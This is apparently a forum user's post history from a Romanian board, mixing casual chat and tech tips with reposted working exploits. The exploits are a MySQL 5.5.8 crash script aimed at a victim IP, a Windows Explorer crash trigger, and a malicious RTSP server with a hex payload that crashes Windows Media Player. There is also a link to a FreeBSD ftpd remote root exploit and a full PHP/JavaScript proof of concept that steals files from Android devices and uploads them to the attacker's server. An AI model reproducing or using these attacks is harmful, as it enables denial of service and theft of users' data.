-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Everything posted by LLegoLLaS
-
4.7 MERCALI;) ps: nu fiti superstitiosi ca aduce ghinion:))
-
#Becuri: depinde de suprafata pe care cad #Cea cu ancora: mai complicata decat pare.Daca ai o bila de metal (ancora) si o scufunzi intr-o cana (bazin) nivelul lichidului din cana va creste cu x milimetri.Daca insa pui bila pe o minge de ping-pong taiata nivelul apei va creste mai mult. Raspunsul la intrebvare este: nivelul apei scade #Buruieni: ai n buruieni. n-2 =trandafiri (1) (n-2)-2 =margarete (2) [(n-2)-2]-2=lalele. (3) (1)(2)(3) => ai cel putin 6 flori (pt pesimisti) sau cel putin 7 (pt optimisti) #Nemtii is cei mai inalti:Consult statisticile? @cris2decoder da
-
programul lui se ocupa de Half Open Connections probabil.N-am stat sa ma uit. @justfor nu mai posta programe de genu
-
Daca am mai vazut asa ceva sigur a fost cu multe milioane de ani in urma,reconstituit pe calculator si difuzat pe discovery,la o ora tarzie. "Tulai doamni si traznesti" LE: toata lumea face petitii pentru orice.Nu se poate face una sa se desfiinteze dracu jocu ala?Dispus sa donez pentru asta
-
Cat i-ai dat pe forum? Cunostinte?
-
import socket, sys print "\n" print "----------------------------------------------------------------" print "| MySQL 5.5.8 Null Ptr (windows) |" print "| Level Smash the Stack |" print "----------------------------------------------------------------" print "\n" buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00") buf2=("\x11\x00\x00\x00\x03set autocommit30") def usage(): print "usage : ./mysql.py <victim_ip>" print "example: ./mysql.py 192.168.1.22" def main(): if len(sys.argv) != 2: usage() sys.exit() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) HOST = sys.argv[1] PORT = int(3306) s.connect((HOST,PORT)) print "[*] Connect" s.send(buf) print "[*] Payload 1 sent" s.send(buf2) print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n" s.close() if __name__ == "__main__": main() sursa
-
# Windows 2008 SP2 RC2 Explorer Go Byebye # Windows 7 Pro SP1 Explorer Go Byebye # Interesting # Brought to you by Level & z0r0 @ Smash The Stack from win32com.shell import shell, shellcon from os import mkdir try: mkdir("c:\\trigger_alt") except: print "[!] Trigger Directory Exists" try: mkdir("c:\\trigger_alt\\....") except: print "[!] Trigger Sub Directory Exists" print "[!] Triggering Issue" # This moves the directory containing the sub directory which creates the condition. # The issue is in the function that moves the files to the recycle bin # Replicate this using the following # 1- mkdir c:\trigger_alt # 2- cd c:\trigger_alt # 3- mkdir ....\ # 4- My Computer -> c:\trigger_alt # 5- Right Click -> Delete shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION)) Copyright 2011 - BugSearch sursa
-
import socket, binascii print "\n" print "----------------------------------------------------------------" print "| WMP11 Remote Null Pointer |" print "| Level, Smash the Stack |" print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |" print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |" print "----------------------------------------------------------------" print "\n" print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n" HOST = "127.0.0.1" PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) buf = [ ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746" "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643" "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683" "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474" "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310" "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206" "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7" "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636" "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726" "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205" "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363" "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7" "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7" "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0" "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393" "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494" "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746" "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7" "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707" "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414" "1414141414c784141414141414141414141414141414141414141664141414141414141414843677" "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414" "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414" "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707" "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415" "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414" "1414141414141414151414141414141514145414150414141414141414141416b516663743765707" "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415" "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414" "1414149414141414167414141414141595145424145416641414151414141414151415141416f414" "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676" "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316" "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414" "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414" "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7" "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0" "a0d0a") ] while True: conn, addr = s.accept() print "-----Request From Client-----\n" print conn.recv(1024) print "-----Request From Client-----\n" print "-----Response From Server-----\n" print binascii.unhexlify(buf[0]) print "-----Response From Server-----\n" conn.send(binascii.unhexlify(buf[0])) conn.close() s.close() #CRASH #(ae8.5b8): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll - #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #0:021> g #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!) #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #PAYLOAD# #RTSP/1.0 208 OK #Content-Type: application/sdp #Vary: Accept #X-Playlist-Gen-Id: 176 #X-Broadcast-Id: 0 #Content-Length: 879 #Date: Sun, 08 May 2011 15:24:33 GMT #CSeq: 1 #Server: WMServer/9.1.1.3841 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT #Etag: "168" #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable sursa
-
Mai umpic si gasesc procesoare oricum...tot ciudat ramane
- 4 replies
-
- arheologie
- bratara
-
(and 2 more)
Tagged with:
-
HTC Wildfire merge decodat asa?
-
Vezi in bios sa fie setarile corecte pentru boot.Incearca un restore default.Daca nu, repair cu cdu
-
merge brici.Sa-l lasi asa,nu-l face cu 3.5 pt tot prostu
-
Free Torch Nokia 6303 Classic Java Apps - Mobiles24.com
-
Cade-n cur si se ridica Bine ai venit shogore =)
-
Bine ai venit ;)tine-te de treaba
-
cel putin o ora te tin cred ps: there is only one way to find out
-
La mine nu se downloadeaza chat.php indiferent de browser. @Nytro Te-as ruga sa-mi setezi Join date(mar2008),rep power (5) si sutom title (668.5)
-
depinde de care is: NiCD,NiMH, depinde si de capacitate (cati mAh) si bineinteles la ce ii folosesti,depinde de aseamenea de gradul de uzura,de calitate (una e serioux si alta e duracell sau energizer)
-
sa-mi moara ce-am pe casa daca am inteles ce ai vrut sa zici
-
E ok, au mai ramas join date (Mar 2008) si Rep Power(5). ps; si pe tema RST Beta,la Infractions e fontu negru la coloanele Expires,Points,date .
-
/* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * ***************************************************************************** * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; * FreeBSD-6.3 i386 * FreeBSD-5.5,5.2 i386 * FreeBSD-8.2 amd64 * FreeBSD-7.3, 7.0 amd64 * FreeBSD-6.4, 6.2 amd64 * */ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: http://www.exploit-db.com/sploits/7350roaringbeastv3.tar sursa
-
<?php /* * Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities * Bugtraq ID: 48256 * CVE: CVE-2010-4804 * Affected: Android < 2.3.4 * Author: Thomas Cannon * Discovered: 18-Nov-2010 * Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/ * * Filename: poc.php * Instructions: Specify files you want to upload in filenames array. Host this php file * on a server and visit it using the Android Browser. Some builds of Android * may require adjustments to the script, for example when a German build was * tested it downloaded the payload as .htm instead of .html, even though .html * was specified. * * Tested on: HTC Desire (UK Version) with Android 2.2 */ // List of the files on the device that we want to upload to our server $filenames = array("/proc/version","/sdcard/img.jpg"); // Determine the full URL of this script $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http"; $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]; // Stage 0: Display introduction text and a link to start the PoC. function stage0($scripturl) { echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>"; } // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect // to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the // context of the local device - this is the vulnerability. function stage1($scripturl) { echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">"; } // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). function stage2($scripturl,$filenames) { header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=poc.html"); header("Content-Type: text/html"); header("Content-Transfer-Encoding: binary"); ?> <html> <body> <script language='javascript'> var filenames = Array('<?php echo implode("','",$filenames); ?>'); var filecontents = new Array(); function processBinary(xmlhttp) { data = xmlhttp.responseText; r = ''; size = data.length; for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff); return r; } function getFiles(filenames) { for (var filename in filenames) { filename = filenames[filename]; xhr = new XMLHttpRequest(); xhr.open('GET', filename, false); xhr.overrideMimeType('text/plain; charset=x-user-defined'); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } } xhr.send(); } } function addField(form, name, value) { var fe = document.createElement('input'); fe.setAttribute('type', 'hidden'); fe.setAttribute('name', name); fe.setAttribute('value', value); form.appendChild(fe); } function uploadFiles(filecontents) { var form = document.createElement('form'); form.setAttribute('method', 'POST'); form.setAttribute('enctype', 'multipart/form-data'); form.setAttribute('action', '<?=$scripturl?>?stage=3'); var i = 0; for (var filename in filecontents) { addField(form, 'filename'+i, btoa(filename)); addField(form, 'data'+i, filecontents[filename]); i += 1; } document.body.appendChild(form); form.submit(); } getFiles(filenames); uploadFiles(filecontents); </script> </body> </html> <?php } // Stage 3: Read the file names and contents sent by the payload and write to a file on the server. function stage3() { $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!"); fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); fclose($fp); echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!"; } // Select the stage to run depending on the parameter passed in the URL switch($_GET["stage"]) { case "1": stage1($scripturl); break; case "2": stage2($scripturl,$filenames); break; case "3": stage3(); break; default: stage0($scripturl); break; } ?> sursa